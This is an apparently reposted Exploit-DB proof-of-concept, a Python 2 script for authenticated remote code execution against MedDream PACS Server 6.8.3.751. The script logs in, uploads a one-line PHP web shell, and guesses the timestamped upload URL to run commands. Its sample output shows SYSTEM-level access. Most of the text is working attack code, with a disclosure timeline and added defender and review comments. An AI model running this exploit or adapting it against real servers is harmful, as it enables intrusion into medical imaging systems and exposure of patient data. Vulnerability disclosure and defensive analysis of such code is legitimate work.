MedDream PACS Server 6.8.3.751 – Remote Code Execution (Authenticated)

  • 作者: bzyo
    日期: 2020-10-02
  • 来源:https://www.exploit-db.com/exploits/48853/
  • #!/usr/bin/python
    #
    #
    # Exploit Title: MedDream PACS Server 6.8.3.751 - Remote Code Execution (Authenticated)
    # Exploit Author: bzyo
    # Twitter: @bzyo_
    # Exploit Title: MedDream PACS Server 6.8.3.751 - Remote Code Execution (Authenticated)
    # Date: 2020-10-01
    # Vulnerable Software: https://www.softneta.com/products/meddream-pacs-server/
    # Vendor Homepage: https://www.softneta.com
    # Version: 6.8.3.751
    # Tested On: Windows 2016
    #
    #
    # Timeline
    # 05-02-20: Submitted incident through email, immediate response
    # 05-04-20: Issue resolved; new version 6.8.3.1.751 released
    # 
    # Note: Core Vulnerability resides in another product which has been remediated as well
    #
    ##PoC##
    #
    # 1. create one line php shell to call commands
    # 2. run script on attacking machine
    # 3. enter parameters; IP, filename, username, password, command
    # 
    #
    # root@kali:~# python meddream.py 
    # Enter IP Address: 192.168.0.223
    # Enter payload filename + .php: cmd.php
    # Enter Username: user1
    # Enter Password: SoSecure!!
    # Enter command: whoami
    # 212357
    # <pre>nt authority\system
    # </pre>
    # http://192.168.0.223/Pacs/upload/20201001-212357--cmd.php?cmd=whoami
    # 404
    # 404
    # 404
    # 404
    # 404
    # 404
    # 404
    # 404
    # 404
    #
    #
    
    from urllib2 import urlopen
    from bs4 import BeautifulSoup
    import requests
    import sys
    import time
    from datetime import datetime, timedelta
    
    # Interactive parameters (Python 2 raw_input, so these prompts run at import
    # time, before main() is ever called): target host, the local file that will
    # be uploaded under its own name, PACS web credentials, and the string that is
    # later appended verbatim as "?cmd=" to the probe URL. Nothing is validated.
    ip_addr = raw_input("Enter IP Address: ")
    user_file = raw_input("Enter payload filename + .php: ")
    uname = raw_input("Enter Username: ")
    pword = raw_input("Enter Password: ")
    cmd = raw_input("Enter command: ")
    
    # The three MedDream endpoints touched by main(): the login page (fetched to
    # scrape hidden form fields), the credential POST target, and the attachment
    # upload handler. All are plain http://, so the credentials cross the wire in
    # clear text -- worth noting separately when assessing this deployment.
    URL1= 'http://' + ip_addr + '/Pacs/login.php'
    URL2= 'http://' + ip_addr + '/Pacs/authenticate.php'
    URL3= 'http://' + ip_addr + '/Pacs/uploadImage.php'
    
    def main():
        """Log in to the PACS web UI, upload *user_file* as an attachment, then probe
        the upload directory for it and print the first 200 response.

        All inputs come from the module-level globals read at import time. Steps:
          1. GET login.php and scrape the hidden ``formAntiSpam`` and ``aetitle``
             inputs with BeautifulSoup.
          2. POST the credentials to authenticate.php within the same session.
          3. POST the local file to uploadImage.php as multipart field
             ``uploadfile`` with MIME type application/x-php.
          4. Judging by the probe URLs below and the sample run in the header, the
             server stores attachments as ``<YYYYMMDD>-<HHMMSS>--<filename>`` under
             /Pacs/upload/; the exact second is not known to the client, so ten
             candidate timestamps around "now" are requested.

        Defender notes: the weakness exercised is that the attachment upload
        keeps the client-supplied filename/extension and the upload directory is
        apparently served with script execution enabled. In web-server logs this
        traffic appears as a POST to /Pacs/uploadImage.php followed by a burst of
        GETs to /Pacs/upload/<date>-<time>--<name>?cmd=... from one session; the
        vendor fix is the release named in the header comment.

        Returns nothing; output goes to stdout. Propagates requests exceptions on
        network failure, and raises TypeError (subscripting None) if the login
        page lacks either hidden input.
        """
        session = requests.Session() 
        
        site = session.get(URL1)
        
        # Scrape the anti-automation token and the AE title the login form posts.
        soup = BeautifulSoup(site.content, "html.parser")
        antispam = soup.find("input", {"name":"formAntiSpam"})["value"]
        dbname = soup.find("input", {"name":"aetitle"})["value"]
        login_data = {
        'loginvalue': 'login',
        'aetitle': dbname,
        'username': uname,
        'password': pword,
        # NOTE(review): posted under 'formAntispam' although the field scraped
        # above is named 'formAntiSpam' -- the server presumably matches it
        # case-insensitively, since the sample run succeeded; unconfirmed.
        'formAntispam': antispam,
        'login': 'Login',
        }
        
        # The login response is never inspected; a rejected login is only noticed
        # indirectly, as every probe below then returns a non-200 status.
        r = session.post(URL2, data = login_data)
         
        
        # Multipart upload. The file handle from open() is never closed; it lives
        # until the interpreter exits.
        files = [
        ('actionvalue', (None, 'Attach', None)),
        ('uploadfile', (user_file, open(user_file, 'rb'), 'application/x-php')),
        ('action', (None, 'Attach', None)),
        ]
        
        r = session.post(URL3, files=files)
        
        # Date component of the stored filename, taken from the client clock; this
        # assumes the client and server agree on the date (not checked).
        today = datetime.today()
        upload_date = today.strftime("%Y%m%d")
        
        # Build candidate HHMMSS values: now, six one-second steps into the past,
        # and a few forward values. Only the printed up_time1 is echoed to stdout.
        less = 1
        now1 = datetime.now()
        up_time1 = now1.strftime("%H%M%S")
        print(up_time1)
        #varying time checks +/-
        now2 = now1 - timedelta(seconds=less)
        up_time2 = now2.strftime("%H%M%S")
        now3 = now2 - timedelta(seconds=less)
        up_time3 = now3.strftime("%H%M%S")
        now4 = now3 - timedelta(seconds=less)
        up_time4 = now4.strftime("%H%M%S")
        now5 = now4 - timedelta(seconds=less)
        up_time5 = now5.strftime("%H%M%S")
        now6 = now5 - timedelta(seconds=less)
        up_time6 = now6.strftime("%H%M%S")
        now7 = now6 - timedelta(seconds=less)
        up_time7 = now7.strftime("%H%M%S")
        now8 = now1 + timedelta(seconds=less)
        up_time8 = now8.strftime("%H%M%S")
        # NOTE(review): up_time9 is formatted from now8 and up_time10 from now9,
        # so the forward candidates contain repeated values; the list below has
        # fewer distinct timestamps than its ten entries suggest.
        now9 = now8 + timedelta(seconds=less)
        up_time9 = now8.strftime("%H%M%S")
        now10 = now1 + timedelta(seconds=less)
        up_time10 = now9.strftime("%H%M%S")
        
        
        # Probe each candidate path. A 200 means the stored attachment was found
        # at that timestamp; anything else is reported as "404" regardless of the
        # actual status code.
        up_time_array = [up_time1, up_time2, up_time3, up_time4, up_time5, up_time6, up_time7, up_time8, up_time9, up_time10]
        for i in up_time_array: 
            r = session.get('http://' + ip_addr + '/Pacs/upload/'+ upload_date + "-" + i + "--" + user_file + "?cmd=" + cmd)
            if r.status_code == 200: 
                print r.content
                print r.url
            else:
                print ("404")
    
    # Script entry point. Note that the raw_input() prompts at module level have
    # already run by this point, so importing this file also blocks on stdin.
    if __name__ == '__main__':
        main()